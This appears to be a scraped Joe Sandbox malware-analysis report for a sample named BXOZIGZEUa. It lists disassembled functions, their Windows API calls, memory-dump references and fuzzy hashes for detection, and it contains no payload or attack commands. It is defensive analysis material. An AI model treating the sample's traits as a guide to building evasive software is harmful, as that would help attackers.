Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: ede82fc9f2dc32d7ee0dbb6e4cfeabfc2d2a7f68a231f17c0d85d22b8421eb46
Instruction ID: abb550e648f77b64784437f22d1a9ee73421d5b19aa1cf19c069057ce1241acd
Opcode Fuzzy Hash: ede82fc9f2dc32d7ee0dbb6e4cfeabfc2d2a7f68a231f17c0d85d22b8421eb46
Instruction Fuzzy Hash: 72B04831000509BB8B152B62DC0AC693E2AEA816A0B104424B80949021DE72AD92AA88

Function 004D8A90 Relevance: 1.6, APIs: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 004D8ADE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
Instruction ID: 02fee1a429d4c1d7992f827e6cb1385e71ba5271b356a0b577d65ed26759fe7c
Opcode Fuzzy Hash: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
Instruction Fuzzy Hash: 82118C76600A05AFC309DF6CC891CAAB7B9FF8931071586AEE5598B351EB31ED01CBD4

Function 004E1632 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004E1639

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: 71ddd5cae70d2240d987bc81d6097924373af9f77836be75a9a1d69462517b05
Instruction ID: 93887290a795610aabd668e7634644a67f87a1fdb77e2abef007835c29c1317c
Opcode Fuzzy Hash: 71ddd5cae70d2240d987bc81d6097924373af9f77836be75a9a1d69462517b05
Instruction Fuzzy Hash: AF0175746401839FDB25AF768812B6A76E3BB50366B19102EE4518B3A1DF38CD40CB58

Function 004DE70E Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004DE738

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Exception@8H_prolog3Throw__wcsicoll
String ID:
API String ID: 1238845444-0
Opcode ID: 4c228a33c86e400e95433e714d426b2f606b709a90dffcd125c608e2ef0bd758
Instruction ID: a682091c10014ee7efd0c88a3c678a1dd5c5180eae1c6cc14efa7ad2936c0a02
Opcode Fuzzy Hash: 4c228a33c86e400e95433e714d426b2f606b709a90dffcd125c608e2ef0bd758
Instruction Fuzzy Hash: F9E0ED3220011867CB14AE29DC61AEB3B949F00764F00022BF906963E2DE34DD5092D9

Function 004D8780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindResourceW.KERNELBASE(?,?,00000006,00000104,004DA1B8,?,004DADE8,?,?,?,00000000,?,004DA1B8,0000E000,?,00000100), ref: 004D8798

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: c7f6c632ef019728501bdcf8b22a072b5780ee46a39435a3236e7675570e60eb
Instruction ID: 044f81cc4472e3c559470a393b462032e09b1b092f960de5cdea22a412ce8c33
Opcode Fuzzy Hash: c7f6c632ef019728501bdcf8b22a072b5780ee46a39435a3236e7675570e60eb
Instruction Fuzzy Hash: 2FE0C22630002837D9101A4EBC45DBB779CDBD2BBAB00403BFD4DEB300DA69E812A2F0

Function 004DAF3A Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004DAF59

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
Instruction ID: 095892ce32c3148df2870fddd657fc131e9c1b01d871b4b0f48db73491300081
Opcode Fuzzy Hash: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
Instruction Fuzzy Hash: B2E09273500616AFC7009F49D454B86FBDCEF91370F16C4ABE804CB352C6B9E8148BA4

Function 004DB3BB Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,?,?,00000000,004D1C42,?,00000000,*.*,00000003,?,00000001,9E026D90,?,?,00000000), ref: 004DB3EF

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 89eaa9c468673b38799d15aba3f7b34eb81b1f63c499f78dd5476c1359cdef71
Instruction ID: 74dc8af17251732f28c92a8fa03db88b084ad6c35109fdc364dd42992348c856
Opcode Fuzzy Hash: 89eaa9c468673b38799d15aba3f7b34eb81b1f63c499f78dd5476c1359cdef71
Instruction Fuzzy Hash: 3DE06D31500B00DFD7208B19F944A63B7E0EB88B20F01C82FE4AEC3B50D774A840CA44

Function 004DD0A7 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 004EE769: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004EE79C
Part of subcall function 004EE769: _memset.LIBCMT ref: 004EE7B5

SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 004DD0C8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressInfoParametersProcSystem_memset
String ID:
API String ID: 831922234-0
Opcode ID: 4e7b465c8909834e5e339d539f504f1327f3888806d0ca459d43ca38b7b09784
Instruction ID: 1ada6c14db09ce3f0d668f37b489010468856bf91a709e2e515944c36bb59b88
Opcode Fuzzy Hash: 4e7b465c8909834e5e339d539f504f1327f3888806d0ca459d43ca38b7b09784
Instruction Fuzzy Hash: ABD01271180305AFEB116B46DC05FB63B59DB95719F500C22F905CF191CABAAC90D66A

Function 005CCD12 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 005CEBA3: __lock.LIBCMT ref: 005CEBA5

__onexit_nolock.LIBCMT ref: 005CCD2A

Part of subcall function 005CCC2B: DecodePointer.KERNEL32(?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCC40
Part of subcall function 005CCC2B: DecodePointer.KERNEL32(?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCC4D
Part of subcall function 005CCC2B: __realloc_crt.LIBCMT ref: 005CCC8A
Part of subcall function 005CCC2B: __realloc_crt.LIBCMT ref: 005CCCA0
Part of subcall function 005CCC2B: EncodePointer.KERNEL32(00000000,?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCCB2
Part of subcall function 005CCC2B: EncodePointer.KERNEL32(?,?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCCC6
Part of subcall function 005CCC2B: EncodePointer.KERNEL32(-00000004,?,005F9AF0,0000000A,?,?,005CCD2F,?,00637F00,0000000C,005CCD5B,?,?,005133A0,h fd), ref: 005CCCCE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 5d697106928f9c0c95254077ba9b7328b885a6c6725fbba041de43cf30be19e9
Instruction ID: 82c752695371db699c0bf82a935b009ce551b1cb765c85a0a77367c7c8b70f28
Opcode Fuzzy Hash: 5d697106928f9c0c95254077ba9b7328b885a6c6725fbba041de43cf30be19e9
Instruction Fuzzy Hash: 68D0177090020BEEDB10BBE4D90AF5DBE61BF80311F60416DF029AA1D2CA740A418B00

Function 004E0636 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004E0645

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: bcc5382eafe289361a990abcebcb3a140bf346389edbfecca0dffea1c624e247
Instruction ID: 0a4d7900bbb93e44782ece0713cc93965410783cc803d361895cc32392ad9c7d
Opcode Fuzzy Hash: bcc5382eafe289361a990abcebcb3a140bf346389edbfecca0dffea1c624e247
Instruction Fuzzy Hash: 52B09270806241AEDE106732890873635546BE030BF108899A011D2041DEBD8096D548

Non-executed Functions

Function 0051CF37 Relevance: 53.5, APIs: 28, Strings: 2, Instructions: 1017windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0051CF6A
IsWindow.USER32(?), ref: 0051CF7F
MonitorFromPoint.USER32(?,?,00000002), ref: 0051CFF0
GetMonitorInfoW.USER32(00000000), ref: 0051CFF7
CopyRect.USER32(?,?), ref: 0051D009
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0051D019
GetSystemMetrics.USER32(00000033), ref: 0051D19D
GetSystemMetrics.USER32(00000006), ref: 0051D1A3
SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0051D228
SendMessageW.USER32(?,00000418,00000000,FFFFFFFF), ref: 0051D242
SetRectEmpty.USER32(?), ref: 0051D4A5
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0051D50E
GetWindowRect.USER32(?,?), ref: 0051D5F1
ClientToScreen.USER32(?,?), ref: 0051D83C
ClientToScreen.USER32(?,?), ref: 0051D863
ClientToScreen.USER32(?,?), ref: 0051D9FC
ClientToScreen.USER32(?,?), ref: 0051DA24
GetSystemMetrics.USER32(00000002), ref: 0051DABF
IsRectEmpty.USER32(?), ref: 0051DACF
GetSystemMetrics.USER32(00000002), ref: 0051DADB
GetWindowRect.USER32(?,?), ref: 0051DBDB
IntersectRect.USER32(?,?,-00000054), ref: 0051DC3C
InvalidateRect.USER32(?,-00000054,00000001), ref: 0051DC51
UpdateWindow.USER32(?), ref: 0051DC5A
IntersectRect.USER32(?,?,-00000054), ref: 0051DCA3
InvalidateRect.USER32(?,-00000054,00000001), ref: 0051DCB8
UpdateWindow.USER32(?), ref: 0051DCC1
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,?,?,?,?,00000014,00000000), ref: 0051DCFF

Strings

(`, xrefs: 0051D36E
(, xrefs: 0051CFE6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$System$ClientMetricsScreen$EmptyInfoIntersectInvalidateMessageMonitorRedrawSendUpdate$CopyFromParametersPoint
String ID: ($(`
API String ID: 840757265-3489612758
Opcode ID: ac82686d8b3125b12c8afa1e1c57b8448c3dc6c0f0239cd06acfe3a1e7f5f156
Instruction ID: 3f8d89e8c7392e3763150dd81677501510e9edaca9d03ebed1a7574d96c0ba6f
Opcode Fuzzy Hash: ac82686d8b3125b12c8afa1e1c57b8448c3dc6c0f0239cd06acfe3a1e7f5f156
Instruction Fuzzy Hash: F3A22971A00219DFDF15CF68C884BEDBBB1BF48304F1845BAE849AB255DB71A981CF60

Function 0055C7D7 Relevance: 37.1, APIs: 20, Strings: 1, Instructions: 325windowkeyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0055C7E1
GetKeyState.USER32(00000001), ref: 0055C826
GetKeyState.USER32(00000002), ref: 0055C833
GetKeyState.USER32(00000004), ref: 0055C840
GetParent.USER32(?), ref: 0055C865
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0055C919
_memset.LIBCMT ref: 0055C92D
ScreenToClient.USER32(?,?), ref: 0055C954
_memset.LIBCMT ref: 0055C962
GetCursorPos.USER32(?), ref: 0055C9B8
SendMessageW.USER32(?,00000412,00000000,?), ref: 0055C9DC
SendMessageW.USER32(?,00000432,00000000,?), ref: 0055CA3C
SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0055CA62
SendMessageW.USER32(?,00000411,00000001,?), ref: 0055CA7E
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0055CA91
SendMessageW.USER32(?,00000433,00000000,?), ref: 0055CABC
_memset.LIBCMT ref: 0055CAE4
_free.LIBCMT ref: 0055CB0E
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0055CB25
GetParent.USER32(?), ref: 0055CB52

Strings

,, xrefs: 0055C979

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3_ScreenWindow_free
String ID: ,
API String ID: 2464378573-3772416878
Opcode ID: 519eb7502c1c190a6a55ee4d791d551be532df82708a13e8f80c8518071759c0
Instruction ID: b783a7c9dbcd07eb2f97ceda94d3d437554827ccc35269d9f0a92d14127c0ff0
Opcode Fuzzy Hash: 519eb7502c1c190a6a55ee4d791d551be532df82708a13e8f80c8518071759c0
Instruction Fuzzy Hash: F1C18B71A003159FDF20DFA4C899BAD7FB1FB04711F24412AEA15A71A2DB75AC48DF40

Function 0054107C Relevance: 27.6, APIs: 14, Strings: 1, Instructions: 1378COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00541086
InflateRect.USER32(000000FE,000000FD,00000000), ref: 005410F9
GetParent.USER32(?), ref: 005411A5

Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4

Strings

..., xrefs: 00541D23

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3H_prolog3_InflateParentRect
String ID: ...
API String ID: 1906238279-440645147
Opcode ID: e7f9509baf35d7709f6c563fb9d522dcc8eff860684cb21dcb88bb165df2b1c8
Instruction ID: ae57c0431f533a54bc4dac5698fc101e02634b62c38e92983d149a59d9791e32
Opcode Fuzzy Hash: e7f9509baf35d7709f6c563fb9d522dcc8eff860684cb21dcb88bb165df2b1c8
Instruction Fuzzy Hash: 8BC25B31900619CFDF25DF65C844BEEBBB6BF49308F2441AAE809AB252DB319D85CF54

Function 0056083D Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00560844

Part of subcall function 00543605: FillRect.USER32(?,00000020), ref: 00543619

Strings

d, xrefs: 0056089C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FillH_prolog3Rect
String ID: d
API String ID: 1863035756-2564639436
Opcode ID: 04d353e8da047fd0d6f91cacc4cb5fd3c6a3afccc4a22bd3eaae275bf2f19fef
Instruction ID: 201ff978f6cd61e4fe76cb20f6223e1c92932c66cc5c17fe42663fa444a80b97
Opcode Fuzzy Hash: 04d353e8da047fd0d6f91cacc4cb5fd3c6a3afccc4a22bd3eaae275bf2f19fef
Instruction Fuzzy Hash: 28C1C97190022A9FCB14DFA9CC959BEBFB1FF48304F10462AF452E7291CB388955DBA0

Function 005109D9 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 430windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00510A2B
IsRectEmpty.USER32(?), ref: 00510A35
IsIconic.USER32(?), ref: 00510A90
BeginDeferWindowPos.USER32(00000000), ref: 00510ACA
GetClientRect.USER32(?,?), ref: 00510AF4
IsRectEmpty.USER32(?), ref: 00510AFE
IsRectEmpty.USER32(?), ref: 00510B94
EqualRect.USER32(?,?), ref: 00510BD9
GetParent.USER32(?), ref: 00510DD5
GetWindowRect.USER32(?,?), ref: 00510C80

Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139

EndDeferWindowPos.USER32(?), ref: 00510EC1

Strings

X`, xrefs: 00510B58, 00510E8F
Dc, xrefs: 00510CA9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Client$EmptyWindow$DeferScreen$BeginEqualIconicParent
String ID: Dc$X`
API String ID: 3453398311-1662422523
Opcode ID: 3d9bd17d8cac9920f19455193144aacfd8c1d86baac7d26503a76392380e3244
Instruction ID: 6ff18f57192a79fab201275eb2f7a11ce47772fdcab56695ad8e3597d36333a7
Opcode Fuzzy Hash: 3d9bd17d8cac9920f19455193144aacfd8c1d86baac7d26503a76392380e3244
Instruction Fuzzy Hash: 62F19A31A00209DFDF14DFA5C984AEEBBB6BF49304F141529F806AB295DBB0ADC5CB50

